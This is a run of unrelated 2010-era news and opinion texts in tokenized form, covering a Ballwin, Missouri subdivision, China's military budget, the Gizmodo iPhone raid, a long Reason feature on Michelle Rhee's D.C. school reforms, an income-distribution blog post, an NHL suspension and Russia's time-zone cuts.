Construction on the majority of the homes was completed between 1967 and 1970 .
The last home , at 812 Dutch Mill , was completed in mid 1971 .
The Woodsmill Clubhouse was the original structure on the roughly 116 acre farm .
Prior to the subdivision construction , part of the clubhouse was used as a tack room ( to store bridles and saddles ) for the farms horses .
Originally Woodsmill Subdivision was in unincorporated St. Louis County but was annexed by the City of Ballwin in 1996
Woodsmill Subdivision is located in West St. Louis County in the City of Ballwin , Missouri .
We are conveniently located approximately 2.5 miles south of Highway 40 ( I - 64 ) on Highway 141 ( Woods Mill Road ) .
Henry Avenue borders the west side of our community and allows easy access to Clayton Road to the north and Manchester Road to the south .
Bordering our community to the south / west is the highly rated Parkway Elementary school ( Henry Elementary ) .
Wynfield Estates ( 63129 ) Number of Homes : 124
Subdivision built in : 1988 -94
Price range : $ 250-425
General Location : Oakville
Annual assessment : $ 350 for lighting , common ground , trash pickup
BEIJING — China ’s official military budget will rise by just 7.5 percent in 2010 , a government spokesman said Thursday , a rate that is about half the official increase in recent years and the first to fall below 10 percent since 1989 .
The announcement by Li Zhaoxing , a spokesman for the National People ’s Congress , China ’s legislature , gave no explanation for the slowdown .
Some analysts speculated , however , that China ’s huge economic stimulus program and other efforts to address unemployment and welfare had eaten into monies that in a normal year would go toward defense .
It is also possible that China reduced the growth of its publicly acknowledged defense spending to help allay international concerns about its rising power .
While China ’s government has disclosed more information about military spending in recent years , much of its spending remains secret , and , in the past , military experts in the United States and elsewhere have said Beijing ’s real military spending is at least double the announced figure .
A 2009 Pentagon report estimated China ’s total military spending to be between $ 105 billion and $ 150 billion .
While growing rapidly , China ’s military spending is still dwarfed by that of the United States , which has about $ 719 billion in outlays this year for national defense .
SAN FRANCISCO ( MarketWatch ) --
While law - enforcement officials ponder the legality of computer equipment seized from the home of a blogger , analysts on Tuesday say Apple Inc. may be doing itself harm in the case of a missing iPhone prototype that ended up on the Internet .
The company has long been known for its penchant for secrecy -- and has gone after reporters and bloggers in the past for reporting what it considers to be company secrets .
This time , with an investigation now in the hands of prosecutors , analysts believe that Apple AAPL , +1.50 % is at the very least likely to land a big black eye , in terms of negative publicity .
Roger Kay of Endpoint Technologies Associates said in an interview that Apple blundered by making the case a criminal one , as opposed to a civil case .
" There is no way that this is not negative in some way for the company , " Kay commented .
" The question here is what is Apple hoping to get ? "
He added that Apple and Chief Executive Steve Jobs " have in the past known how to back out of mistakes pretty quickly . "
But the state is now the " wild card , " as it is running the investigation .
" Apple has been drifting into looking like the wrong side of their famous Big Brother ad for some time , " observed Rob Enderle , a longtime Silicon Valley technology analyst .
" This could easily turn out to be one of the biggest mistakes the firm has ever made because the investigation ... could showcase other Apple problems as this story snowballs . "
' Shield ' delay
The chief deputy district attorney for San Mateo County , Stephen Wagstaffe , said Tuesday that computers and other gear taken from the Bay Area home of Jason Chen , an editor for the popular gadget blog Gizmodo , will not be examined until the office determines whether the material is covered by California " shield laws " that prevent law - enforcement authorities from examining material gathered by journalists .
On Monday , Gizmodo reported that Chen 's house had been raided by the Rapid Enforcement Allied Computer Team task force , which seized several computers and related gear .
See full story on the raid on the blogger .
Earlier this month , Chen and his employer said they paid $ 5,000 for an apparent prototype of an iPhone that was found in a bar in Redwood City , Calif .
The device allegedly was left by an Apple employee and was found by another patron , who sold it to Gizmodo .
The blog ran a detailed story on the new device , which is widely believed to be the next version of the popular iPhone that Apple is expected to introduce sometime this summer .
Read the Gizmodo post .
Apple complained to local authorities , reporting the matter as a theft to the San Mateo County prosecutors .
Chief Deputy District Attorney Wagstaffe said the company was referred to REACT , a multicounty law - enforcement team that investigates high - tech crimes in Silicon Valley .
Wagstaffe said the DA 's office actually has not searched the equipment taken from Chen 's home .
Gawker Media , owner of the Gizmodo site , claims the equipment is covered by California 's shield laws .
Legal specialists in the San Mateo district attorney 's office are examining the question , and hope to make a recommendation to the REACT team by the end of the week .
" We can do this one completely aboveboard .
We 're not going to lose any evidence by waiting to search this equipment , and we 're not going to invade anyone 's privacy if we determine not to use it , " Wagstaffe said , adding that his office was dealing with " a fairly novel area of law . "
Gizmodo blogger Jason Chen with a prototype of a next - generation iPhone .
Gizmodo
Control key
It is not known exactly what information the company gave to the REACT team to spark the investigation .
An affidavit used to secure the search warrant will not be filed publicly until 10 days after the warrant was executed , according to Wagstaffe .
That affidavit could contain more information about what the company told investigators .
The chief deputy district attorney also indicated that the search warrant is not considered executed until investigators actually search the computers themselves .
He said the REACT team will make the decision on whether to search the machines once his office makes a recommendation .
Yet the case brings to light " Apple 's excessive control over local law enforcement , " according to Enderle , and may even play into local politics in an election year .
Gene Munster , who covers Apple for Piper Jaffray , does not think that the news will hurt the stock or that the company itself in the long term , except for the possible effect of people delaying a purchase of an iPhone during the June quarter in the hopes of getting a newer device later in the year .
" It 's been a great PR event for Apple , because people are fighting over the iPhone , " Munster said in an interview .
" It shows the amount of interest Apple has . "
Shares of Apple were down nearly 2 % to $ 264.16 by early Tuesday afternoon -- part of a heavy sell - off in the tech sector as well as on the broader market .
But the company 's image could suffer , as it already has employed heavy - handed tactics to keep its products under wraps .
This also is not the first time it has gone after a blogger .
Apple sued sites called PowerPage.org and Think Secret in 2005 for revealing details of unreleased products .
Think Secret later agreed to shut down as part of a settlement deal with the company .
See previous story on Think Secret 's shuttering .
Enderle said the company also does n't buy any favors with the press this way , even if Apple does not consider bloggers to be part of the established press .
" The age - old advice is do n't attack folks who buy ink by the barrel .
That likely should be updated to not attacking folks who have page hits in the millions . "
American public school teachers do n't get fired .
They just do n't .
In New York City , hundreds of teachers spend all day in " rubber rooms " because they 're deemed too dangerous or stupid to supervise children but can't be booted because they have union - protected tenure .
In crisis - ridden California , the mildest of threats from Gov. Arnold Schwarzenegger to cut back on teaching staffs led to an immediate rebuke from the White House .
So when 266 teachers were unceremoniously canned in Washington , D.C. , in the fall of 2009 , the educators of America collectively slid their glasses down their noses and glared at the District of Columbia .
Although 266 firings might not seem like a lot in a country that has lost 8.4 million jobs since December 2007 , they could turn out to be more important to the nation 's long - term health than the $ 150 billion " jobs bill " legislators were debating on Capitol Hill .
D.C. is a divided town .
In the heart of the capital , the federal government hums along , churning out paperwork and disillusioned interns at a steady clip .
But the rest of the city is in pretty miserable shape .
The District of Columbia Public Schools rank below all 50 states in national math and reading tests , squatting at the bottom of the list for years at a time .
More than 40 percent of D.C. students drop out altogether .
Only 9 percent of the District 's high schoolers will finish college within five years of graduation .
And all this failure does n't come cheap :
The city spends $ 14,699 per pupil , more than all but two states and about $ 5,000 more than the national average .
Yet as unlikely as it seems , D.C. may prove to be the last best hope for school reform in the United States .
The District 's school system is sitting at the center of a remarkable convergence .
A driven , reform - minded chancellor , endowed with extraordinary powers by the city council and mayor , arrived on the scene in 2007 just as the teachers union 's contract was about to be renegotiated .
Charter schools are blossoming , with nearly a third of the city 's public school students now enrolled in nontraditional institutions .
And a new presidential administration , which has been retrograde in other policy areas ripe for reform , has flirted with some of the more advanced ideas on the education front .
Add an education secretary who has respectable reform credentials and a president who has two school - age children , and it's hard to imagine a sweeter set - up .
One further advantage , paradoxically , is the city 's utter hopelessness .
" D.C. schools have long been the poster child for paralyzing education dysfunction , " says Neal McCluskey , an education policy analyst at the Cato Institute .
" It seems like they have a complete inability to educate anyone .
Educationally , if you could save this patient , you could save anyone . "
But there 's a flip side to all these advantages :
If D.C. can't fix its schools in this context , probably no one can .
And the first indications from the Obama administration have been ominous :
As part of an omnibus spending bill in March 2009 , union - backed Democratic legislators gratuitously killed a promising pilot program for school vouchers in the District .
Meanwhile , the fate of reform hangs in the balance of a long , increasingly tense standoff between superintendent Michelle Rhee and the all - powerful teachers unions over the fundamental question of hiring and firing instructors .
Depending on which side blinks first , education reform in America could be a long - lost dream come true or simply a lost cause .
' You Do n't Want Me for This Job '
Michelle Rhee was an unlikely candidate to take over the D.C. school system , let alone wind up on the covers of both Time and Newsweek .
" I was like the least obvious choice , " says Rhee , whose verbal mannerisms are those of a recent college grad .
The person who suggested Rhee to D.C. Mayor Adrian Fenty did so with a few caveats : " She 's 37 years old , she 's Korean , and she 's never run a school district . "
In fact , Rhee 's only in - school experience was two years in Baltimore as a recruit for Teach for America , a nonprofit that places new college grads in troubled inner-city and rural schools for two - year teaching stints .
In 1997 she founded The New Teacher Project , another nonprofit , which brings highly qualified teachers — people who are credentialed in the subjects they teach — to public schools .
She was busy running that project when Fenty called .
Rhee immediately told the D.C. mayor , " You do n't want me for this job . "
With a bluntness for which she would later become famous , she explained , " If I were to take over the school district , the kinds of things that I would have to do to transform the district " — closing schools , firing teachers — " would just cause you headaches , political headaches .
And that 's not what politicians want .
Politicians do n't want the dirt to get kicked up .
They want everyone to be happy . "
Fenty swore indifference to the political ruckus , and , much to Rhee 's surprise , he has so far remained true to his word .
Rhee enjoys near dictatorial powers within the system , thanks to the absence of a school board , and she has used them to the fullest possible extent .
" The man has not blinked once , " she says .
Rhee has become the Great Korean Hope for school reform advocates around the nation and a lightning rod for criticism locally .
D.C. publications follow her every move .
Blogs are devoted exclusively to hating everything from her policy proposals to her hairstyle .
Almost every move she makes draws headlines .
And no wonder :
Rhee 's approach goes right to the heart of a decades - long political debate about what schools really need , more money or fewer lousy teachers .
On that question her position is clear :
No real change is possible unless good teachers are hired and bad teachers fired .
Within months of taking office , Rhee foreshadowed the bloodbath that lay ahead by firing 30 percent of the school 's central bureaucracy .
She commissioned an outside audit of school records .
( Her staff is still finding rooms filled with unmarked file boxes and cabinets with no keys . )
As her first year ticked away , Rhee staffed the human resources department with her own people , installed modern payroll systems , and generally tidied up the back office .
Before her first school year started , she found 68 people on the books with no discernible duties , 55 teachers , three aides , and 10 assistant principals , costing a total of $ 5.4 million a year .
She closed 25 underperforming schools ( in a district that has 129 ) and replaced half of the system 's principals with candidates hand - selected by her personal staff and interviewed by Rhee herself .
In July 2008 , Rhee revealed her opening gambit with the teachers union :
She offered the teachers a whole lot of money .
Under her proposal , educators would have two choices .
With the first option , teachers would get a $ 10,000 bonus — a bribe , really — and a 20 percent raise .
Nothing else would change .
Benefits , rights , and privileges would remain as they were .
Under the second option , teachers would receive a $ 10,000 bonus , a 45 percent increase in base salary , and the possibility of total earnings up to $ 131,000 a year through bonuses tied to student performance .
In exchange , they would have to forfeit their tenure protections .
To make good on her financial promises , Rhee lined up money from private donors ; she has been close - mouthed about their identities , but The Washington Post has reported that likely contributors include Bill and Melinda Gates and Michael and Susan Dell .
Says Rhee : " I thought , this is brilliant .
Everybody talks about how teachers do n't get paid enough ; I 'm going to pay teachers six - figure salaries !
I 'm going to pay the best teachers twice as much as they are currently making .
Who could not be in favor of that ?
But people went ballistic . "
Getting incentive pay required giving up near - absolute job security .
" That , " she says , " is when the crap hit the fan . "
If Rhee has a model , it is Chicago , one of the only places in America where bad teachers can ( eventually ) get the heave - ho .
In the Second City , failing schools can be dissolved and reconstituted .
Teachers who worked at those institutions must reapply for their jobs , without seniority rights .
Those who fail to get their old posts back are free to apply elsewhere in the city .
If they have n't found a placement in a year , they 're off the books .
Just plain old laid off .
There 's even a small merit pay program .
The man who instituted this plan is Arne Duncan , who is now Obama 's secretary of education .
Teachers simply do n't believe that it should be possible for them to be fired — not by a principal , not by a superintendent , not by anyone .
Unions and other opponents of the reformers prefer to stick with warmed - over solutions that have been failing for decades : smaller class sizes , more teacher pay , and more job security .
The sight of Rhee descending on them , an avenging angel with a pad of pink slips in one hand and a wad of cash in the other , was a shock to the system .
' Rhee Hates Veteran Teachers '
During the spring and summer of 2008 , Rhee started hiring new teachers as if it were , well , her job .
Many were young college graduates , vetted by programs such as Teach for America .
All told , there were 934 new hires .
Rhee was just hitting her stride when a city budget crunch hit , forcing the local government as a whole to make do with several hundred million dollars less than originally planned .
( Of D.C. 's $ 9 billion budget , roughly half is appropriated by Congress . )
Faced with the new fiscal realities , Rhee announced a " reduction in force " and summarily fired those 266 teachers .
At this point the union sprang into action .
They sensed , correctly , that what Rhee longed to do was fire more of the teachers she had inherited , perhaps most of them .
Now she had tasted blood , and they were worried .
No one is better positioned to throw together an afternoon protest rally than a bunch of teachers .
They have poster board and markers on hand at all times , and they get off work at 3 p.m .
On a gray September day shortly after the firing plan was announced , signs declaring that " Cutting Our Teachers Is Hurting Our Kids " festooned the plaza outside the government building that houses the chancellor 's office .
Other placards featured photos of Rhee with her teeth blacked out , alongside portraits of Martin Luther King Jr. The motto " Rhee Hates Veteran Teachers " was particularly popular .
A small child jiggled a sign saying " Rhee and Fenty are playing politics with children . "
The kid seemed just young enough to be unfamiliar with the concept of irony .
The crowd was composed largely of middle - aged black women , and the speaker list was heavy on older black men , reflecting the District 's 83 percent black student population .
Many at the rally were explicit about the race angle .
" You know who Rhee is firing ? " one speaker demanded .
" Teachers who have hair like mine , and skin like mine . "
( Gray and brown , respectively ) .
" Maybe Rhee and Fenty do n't like the way this city looks , " said another .
When a slim Asian - American woman with a short swingy haircut and a pencil skirt — a look favored by Rhee — exited the building , excited whispers ran through the crowd that the Iron Chancellor was coming to face the protesters down .
But it turned out to be a junior employee of the department who just happens to be Korean .
It 's true that the teachers
Rhee hired are younger and paler than the current teacher population .
A few of the newbies even showed up at the rally to demonstrate solidarity with their brethren .
They stood around holding signs and looking slightly uncomfortable as they listened to speech after speech bad - mouthing inexperienced white teachers from outside the city .
One popular applause line : " Young teachers are good for one thing .
Learning from older teachers ! "
In 2008 , after Rhee 's office released a statement about tying teacher licensing to student outcomes , the Washington Teachers Union ( the dominant local union ) sent an email message to its members stating , " This proposed regulation would not benefit DCPS teachers , as a teacher 's true effectiveness should not be linked to a teacher 's right to renew his or her license . "
The message went on to explain that it was " dangerous and discriminatory " to " require a candidate to demonstrate effectiveness to continue teaching in a District of Columbia Public School . "
To review :
The official position of the teachers union is that being good at their jobs has nothing to do with whether teachers should keep them .
In D.C. today , 50 percent of a teacher 's evaluation is based on student outcomes .
In any other industry , this standard would be absurdly low , like basing only 50 percent of a salesman 's performance review on how many units he sells .
Bringing the education labor market anywhere close to the way things work in virtually all other industries — at - will employment , promotion based on competence , and salary based on performance — is an almost unimaginably difficult task .
Rhee says that when she took the job , she made a deal : " I made a commitment at the outset of these negotiations that I was not going to sign my name to a piece of a paper that was just better than what the old contract was .
That I was n't going to sign my name to a piece of paper that had provisions in it that were not good for kids and not good for schools .
Period . "
Her right - hand man , Richard Nyankori , who came with Rhee from The New Teacher Project , told the pro-reform magazine Education Next : " Six weeks into the job , Rhee called her staff together with the message that ' We are not here to do the bureaucracy better .
That 's what all of our friends are doing in reform all around the country :
They 're trying to make the trains stay on the track and go faster .
We are here to derail those trains . '? "
Three years later , the trains are well and truly derailed ; there is still no contract .
But Rhee quickly changed what she could control : rampant grade inflation in the District 's teacher evaluation system .
For years , more than 90 percent of D.C. 's teachers received ratings of " exceeds expectations " on their job evaluations , even though students were dropping out , graduating without basic math and reading skills , and going on to menial jobs at best .
As Rhee told Time in 2007 , " What I 'm finding is that our principals are ridiculously — like ridiculously — conflict - averse . "
( That story 's cover photo of Rhee pushing a broom and looking grim is still producing witch jokes years later . )
These days , the chancellor is a bit more politic : " It 's tough , a tough cultural change for people [ who ] have been told for years , ' You 're doing an excellent job . '
All of a sudden [ they 're ] being told , ' Actually , here are the things you need to work on . '
It 's not an easy thing to go through . "
Changing the evaluation process had another practical benefit .
There is nothing more difficult than firing a teacher with decades of glowing reports in her file .
In a city council hearing about the 266 firings , teacher after teacher testified that their personnel files were filled with sugar and spice and everything nice .
As Rhee told Time , " People come to me all the time and say , ' Why did you fire this person ?
She 's a good person .
She 's a nice person . '
I 'm like , ' OK , go tell her to work at the post office . '
Just because you 're a nice person and you mean well does not mean you have a right to a job in this district . "
In the years before Rhee arrived , about 15 teachers a year were put on the " 90 - day plan , " essentially a final warning to shape up or get shipped out .
Not all of those teachers ultimately got fired .
In addition to the 266 tossed out on their duffs , Rhee has placed more than 100 teachers on 90 - day notice .
( There are now around 3,000 teachers in the District overall . )
And she has stood by her controversial comment in a January Fast Company interview that the laid - off instructors included people who " had hit children , who had had sex with children , [ and ] who had missed 78 days of school . "
Those comments did n't do much to sweeten administration - teacher relations .
" It is really shameful of Rhee to tar all of the staff that she illegitimately fired with such a nasty brush , " wrote retired D.C. teacher Guy Brandenburg on his blog .
" But it 's so typical of her ; like Ronald Reagan , she is utterly convinced of the rightfulness of her cause , and she seldom lets facts get in the way of her just - so stories . "
Another blogger ( and laid - off teacher ) named Candi Peterson told The Washington Post , " I 'm ready to recommend that Chancellor Rhee submit for a fitness for duty examination because these are the rants of either a mad or very confused woman . "
' You 're Going to Have People Who Feel Angsty '
Despite dissension within the ranks , when the doors opened on the 2008 –09 school year , it looked like the local union president might be ready to take Rhee 's deal seriously .
But in December 2008 , Randi Weingarten , the head of the powerful American Federation of Teachers ( AFT ) , stepped in .
( D.C. 's union , like those in several other big-city districts , is part of the AFT , not the larger National Education Association . )
After a half - hearted counterproposal from Weingarten 's team in January 2009 , negotiations once again ground to a halt .
For her part , Rhee sent out a cheery , exclamation mark–filled letter to D.C. teachers in February lauding Weingarten 's intervention in the process , claiming to " welcome her involvement and have high hopes that we 'll reach an agreement . "
But if the two women were sending each other enthusiastically over - punctuated emails in March , by November the relationship had progressed strictly to frowny emoticons , with Weingarten telling The Wall Street Journal that Rhee " has so poisoned the environment that I am not sure that we can ever get back to a good situation here . "
Weingarten is no dummy .
Rhee 's endgame , which she has made fairly explicit , is to seize control of hiring and firing from the unions .
And with the national union involved , the D.C. contract is imbued with more precedent - setting value .
Among other things , the power Rhee seeks means stopping the practice of shoveling teachers no one wants into meaningless jobs no one wants them in .
In other districts , this is known as the Dance of the Lemons .
In D.C. , jobless educators with first dibs on openings are called " excessed " teachers , and they are the dead weight in a slowly sinking system .
If the unions accept Rhee 's bribes , their stranglehold on the nation 's schools will be endangered .
In pre-Rhee D.C. the single glimmer of hope for many families was the D.C. Opportunity Scholarships Program .
Funded by a separate congressional appropriation of $ 14 million , it offered vouchers to kids in failing schools , allowing them to attend private school instead of their assigned public school .
The program took no money from the city budget and was hugely popular with parents and kids ; since 2004 more than 7,200 students had applied for a limited number of slots .
Last year 1,700 kids were accepted .
Next year there will be none .
On the campaign trail , Barack Obama had promised to let scientific results determine his education policy .
In office , however , he let political influence kill the program even as initial studies were showing positive gains by students and high parental satisfaction .
The National Education Association , which is consistently one of the biggest single donors to U.S. political campaigns , pressured the Democratic Congress to eliminate funding for vouchers in 2009 .
Obama promptly signed the death sentence into law .
The fight over vouchers and charter schools — both of which serve as workarounds to the ossified hiring / firing rules of public schools — is playing out all around the country , with teachers unions usually coming out on the winning side .
Consider the philanthropist Robert Thompson , who tried his hardest to give $ 200 million to the city of Detroit .
Thompson 's plan was to establish 15 charter schools with a focus on improving graduation rates in a city where two - thirds of kids quit before receiving a diploma .
After spending most of 2003 trying desperately to get legislative approval for the plan , Thompson withdrew the offer .
The teachers union deep - sixed the proposal in order to save its members from competition , even at the expense of drastically increasing the city 's net spending on education .
In D.C. , despite the voucher setback , the fight for charter schools seems to have been won before anyone really noticed .
As chancellors cycled through the system — six of them in the last 10 years — charters grew quietly but rapidly , without much in the way of overall strategic planning by the city .
It 's relatively easy to open a charter in the District , and a kid in a charter school costs the city less than a kid in a public school , so education entrepreneurs have taken full advantage .
Rhee is very pro-charter , but her rhetoric on the issue is sly .
At an appearance at downtown Washington 's E Street Cinema last November , Rhee conflated charter and traditional schools over and over in her remarks .
She simply refuses to accept the oft - repeated assertion that letting kids go to charter schools undermines traditional schools .
Both types of schools operate under the supervision of her department , she notes .
" We have to be aggressive about closing down schools — charter and traditional public schools — that do n't provide an excellent education , " she told a theater of parents , before running off to another meeting in someone 's living room .
" Change is difficult .
And anytime you try change , you 're going to have people who feel angsty about that . "
' We Believe Great Teachers Matter Tremendously '
That night at the E Street Cinema , Rhee had just announced her engagement to Kevin Johnson , the mayor of Sacramento and a charter school founder himself .
Johnson is better known , however , as a former point guard for the Phoenix Suns .
He also has a couple of sex scandals under his belt , a fact that Rhee 's antagonists gleefully pounce on .
Johnson paid a 16 - year - old girl 's family $ 230,000 in 1995 after allegations of sexual harassment , and a similar allegation was made in 2007 by a student at Johnson 's Sacramento charter school , St. Hope , although the accuser later recanted .
In April 2009 , St. Hope agreed to pay a settlement over inappropriate use of federal AmeriCorps education grants .
In this , as in all things , Rhee has been proactive , doing damage control on the personal scandals and flying to Sacramento to deal with the fallout from the AmeriCorps settlement .
( This will be her second marriage to an education reformer : Kevin Huffman , whom she divorced in 2007 , is an executive vice president at Teach for America . )
Vouchers and charter schools can never be perfect tests of new educational modes .
When teachers unions accuse charters and vouchers of skimming the cream off the top of the public school population , they 're not entirely wrong .
These programs do n't snag the smartest kids or the richest .
But someone , somewhere has to care enough about a kid to get him into a charter school or voucher program .
Without real reform at the underlying schools , the students left behind will remain just as hopeless as they are today , while peers with more motivated parents find other solutions .
Reforming those traditional schools has proven damnably difficult to do .
In Chicago , Arne Duncan — then the CEO of the city 's schools , now the national secretary of education — was able to make some progress on getting rid of bad teachers .
But even in Duncan 's district , hiring and firing remain difficult and time - consuming , and teacher ratings continue to be inflated .
Duncan shares
Rhee 's focus on personnel , pioneering some merit - pay pilot programs in Chicago and telling Education Week : " We believe great teachers matter tremendously .
When you 're reluctant or scared to make that link , you do a grave disservice to the teaching profession and to our nation 's children . "
But where Rhee makes enemies , Duncan has been able to make friends .
In addition to winning the endorsement of AFT 's Weingarten , Duncan got an approving nod from President George W. Bush 's departing education chief , Margaret Spellings , when he was nominated by Obama in 2008 .
In July 2009 , Duncan told PBS 's Newshour : " Money is never going to be the entire answer in education .
I will tell you , quite frankly , far too often adult dysfunction has stood in the way of student achievement and has hindered students ' ability to learn . "
His rejection of the tired " more money " formula in favor of a focus on teacher quality may be the most heartening development in the Obama administration .
Film critic Roger Ebert ( of all people ) recently noted that in many ways , the possibilities for reform look better in Kenya than they do in D.C. or Detroit .
He was blogging about two new documentaries : Waiting for Superman , which discusses the problems of U.S. school systems and features Rhee , and A Small Act , which is about a woman who helps pay for a boy 's education in Kenya .
Ebert arrived at this difficult - to - swallow conclusion : " The fact is that the next African or Indian taxi driver you meet has quite possibly benefited from a better education than the average American high school graduate . "
With Rhee 's root - and - branch reforms stuck in interminable union negotiations , we 're still waiting for Superman .
But what has the Iron Chancellor accomplished so far ?
Ironically , her best work has been in what she set out not to do :
There may not be a revolutionary union contract in place yet , or a bold new educational vision , but the bureaucracy sure runs better than it used to .
' We Only Reward Success '
Nationally , education reformers are desperately hoping that President Obama will take on the cause of school reform , in a kind of domestic equivalent of Nixon going to China .
As is often the case with Obama , his words have been encouraging , even a breath of fresh air :
In his January State of the Union address , he said , " The idea here is simple : Instead of rewarding failure , we only reward success .
Instead of funding the status quo , we only invest in reform . "
In March 2009 , he said " too many supporters of my party have resisted the idea of rewarding excellence in teaching with extra pay , even though we know it can make a difference in the classroom . "
During the presidential campaign , Obama singled out Rhee for praise during a debate with John McCain , calling her " a wonderful new superintendent … who 's working very hard with the young mayor . "
( Rhee has been more stinting in her praise for Obama .
She told reporters that she planned to vote for McCain — " I 'm somewhat terrified of what the Democrats are going to do on education , " she said — but a close friend convinced her at the last minute to switch to Obama . )
Teachers unions contribute more than $ 60 million a year to political campaigns , topping contributor lists at the state and federal levels , and nearly all of the money goes to Democrats .
That investment buys the continuation of the status quo plus some platitudes about class size and teacher pay from every prominent Democrat .
Reformers have virtually no presence on Capitol Hill .
But if anyone can take on the teachers unions and win in the court of public opinion , it 's a liberal black Democratic president .
Still , other than a few passing remarks , President Obama has n't made any noticeable moves in the direction of reform .
So reformers are pinning their national hopes on the education secretary from Chicago .
Duncan , who was confirmed without much fuss , is one of the most reform - friendly education bureaucrats Washington has seen in a long time .
While he gave mealy - mouthed excuses for killing off D.C. 's voucher program and has offered little public support for Rhee — generally his comments take the form of statements like " I do n't get involved in local labor disputes " — Duncan has expanded programs such as Race to the Top , which gives states cash - money incentives to open themselves up to experimental education methods such as charter and magnet schools .
It would n't have been surprising to see such a move from the Bush administration , but Obama has made the unorthodox choice to continue funding Race to the Top , requesting $ 1.35 billion for the program in 2011 .
( See " Obama 's Education Spending Frenzy , " page 50 . )
How about Rhee 's results ?
Scores released by the U.S. Department of Education in December 2009 show slight improvement in the District during her two years at the helm , with fourth - graders making larger gains in math than their counterparts in any other big-city school system and eighth - graders showing similarly impressive improvements .
But Rhee says she still considers the District to be failing its students , and she 's right .
When she arrived , 14 percent of fourth - graders were proficient in math and 14 percent in reading .
Since then , the numbers have moved — a little .
There is now one large urban school district that performed worse than D.C. in 2009 , the dying city of Detroit .
It 's not much , but it 's progress .
Yet tellingly , the Washington school population con-tinues to shrink .
Warren Buffett once told
Rhee that the only way to really get public schools fixed was to make private schools illegal and assign the children of senators and businessmen to public schools by random lottery .
But Buffet is unlikely to get his way , so the opposite trend prevails .
In 2007 –08 there were 71,369 students enrolled in D.C. schools , 49,422 of them in traditional public schools .
In the 2008 –09 those numbers fell to 70,919 and 45,190 , respectively .
This at a time when D.C. 's population is growing .
While Washington 's case is extreme , public schools everywhere in the nation are a widely acknowledged disaster .
Everyone knows the litany of woe .
Americans are falling behind other nations in science and math .
Freshmen routinely arrive at colleges in need of remedial training .
Students continue to secede from public school systems in droves .
" We do n't have any model of an urban school system that has been reformed , " says Michael Petrilli , vice president of the Thomas B. Fordham Institute , an education reform think tank .
" Everybody understands that it's an impossible job .
The stars have aligned here in ways that are unusual , which makes prospects for reform here better .
But Michelle has put a lot — maybe too much — on the long shot that you can get the union to agree to wide - ranging reforms . "
If something gives and D.C. teachers take Rhee 's deal , Washington could become a model for the nation , pushing policy makers to seize the crucial hiring and firing privilege from the iron grasp of the teachers unions .
If the unions turn Rhee down , or if she or her successor settles for a lesser compromise , the possibility for real , revolutionary change may be lost .
Katherine Mangu - Ward ( kmw@reason.com ) is a senior editor at reason .
Cherry - Picking Income Distribution Statistics
Greg Mankiw is critical of Parade magazine ’s “ Annual Salary Survey . ” ?
It ’s a series of pictures of real people , who also ‘ fess up to what they earned last year .?
But this being a glossy magazine , they add in a ? sample of celebrities .?
In consequence :
about 14 ? percent of the people in Parade ‘s sample earn more than $ 1 million a year .?
In the real world , the actual percentage is about 0.2 ? percent .
But Greg is concerned that this sends the wrong message :
There is a common perception in some circles that we can solve all our fiscal problems if only we were willing to tax the rich some more .
Yet , in reality , there are not enough rich for this to work .
By presenting such a skewed cross-section of incomes , Parade inadvertently feeds an all - too - common misperception .
Well , yes and no .?
If we are interested in thinking about the potential taxes the rich can pay , Mankiw ’s 0.2 ? percent is incredibly misleading .?
The issue here is n’t how many ?
people are rich , but rather how many ?
dollars are earned by the rich .
In the spread , each picture is shown as if each person were equally able to pay more taxes .?
But that surely is n’t true .?
If Parade were trying to give a sense of the capacity of each person to pay taxes , they would show much , much larger photos of the rich , and proportionately smaller photos of the rest of us .?
Relative to Facebook CEO ?
Mark Zuckerberg , the photos of most of us would barely register a couple of pixels .
For obvious reasons , they did n’t choose to do this .?
But this inadvertently feeds an all - too - common misperception that because there are n’t a lot of rich people , they do n’t earn a large share of total income .?
They do .
What proportion of income is earned by the rich ??
Let ’s turn to ?
Emmanuel Saez ‘s compilation of income tax statistics .?
The latest data are for 2007 , and for simplicity ’s sake we ’ll examine the broadest measure of income .?
The richest 0.5 percent of families all earned more than $ 632,000 , and received 19.3 percent of all income .
Or alternatively , we can focus on the richest 0.1 percent of families - who all earned more than $ 2 million , and collectively earned an average income of $ 7.1 ? million .?
This sliver of the community - the folks Greg worries about - received 12.3 percent of all income .
The lesson ??
Families earning more than $ 1 ? million probably do represent close to 14 ? percent of total income , and maybe more .?
By arguing that only 0.2 ? percent of families are this rich , Mankiw risks distracting his readers from the fact that increasing the taxes paid by the rich can be a big part of the solution to our fiscal woes .
TORONTO ( AP ) - Minnesota Wild forward Derek Boogaard has been suspended for delivering a knee hit on Edmonton forward Ryan Jones .
The NHL announced the discipline on Saturday .
Boogaard was assessed a minor penalty for kneeing on the play 7:29 into the first period of the Oilers ' 2 - 1 shootout win Friday night .
Boogaard , who was suspended for five games on Feb. 28 , 2009 , is considered a repeat offender under the terms of the collective bargaining agreement and will forfeit more than $ 21,000 in pay .
The money goes to the Players ' Emergency Assistance Fund .
Boogaard will miss games against Calgary and Florida .
He will be eligible to return Thursday at Detroit .
Monday , March 29 , 2010
The Russian government has decided to remove two of its eleven timezones , in the country 's first step towards time reform , first started by president Dmitry Medvedev last November .
The affected regions were Chukotka and Kamchatka , the easternmost provinces of Russia ; and Samara and Udmurtia , which are now on Moscow time .
Each of these regions was moved back an hour .
Kemerovo was also moved back an hour , but this did not eliminate a time zone .
The changes were implemented on Saturday night , when most of the country was due to put their country ahead for summer time ; however , affected areas instead did n't change their clocks at all .
" It 's possible that this could also aid the strengthening of Russia 's position as a link in the global information infrastructure , " Medvedev remarked earlier this month .
" Reducing of amount of time zones is very efficient for managing , for accordance of actions , for approximation of far regions to the center , " commented Arkady Tishkov , who is a deputy science director of Geography Institution for the Russian Academy of Sciences .
Tishkov speculated that the number of time zones could eventually be reduced to six .
Meanwhile , an online petition has been posted opposing the time change for the Samara province , and it has garnered close to 13,000 signatures .
" Trips take place to many regions of the country and world where time , you understand , far from always corresponds with Moscow , " the text of the petition read , adding that " [ i ] n the winter , darkness will come almost at lunchtime , which is n't convenient and is psychologically quite hard . "
Sources
Recounting the exploits of two young reporters who went undercover to uncover the ACORN scandal , online publisher Andrew Breitbart on Saturday exhorted a widely held view among those in the tea party movement : Liberals and media organizations “ can no longer control the narrative . ”
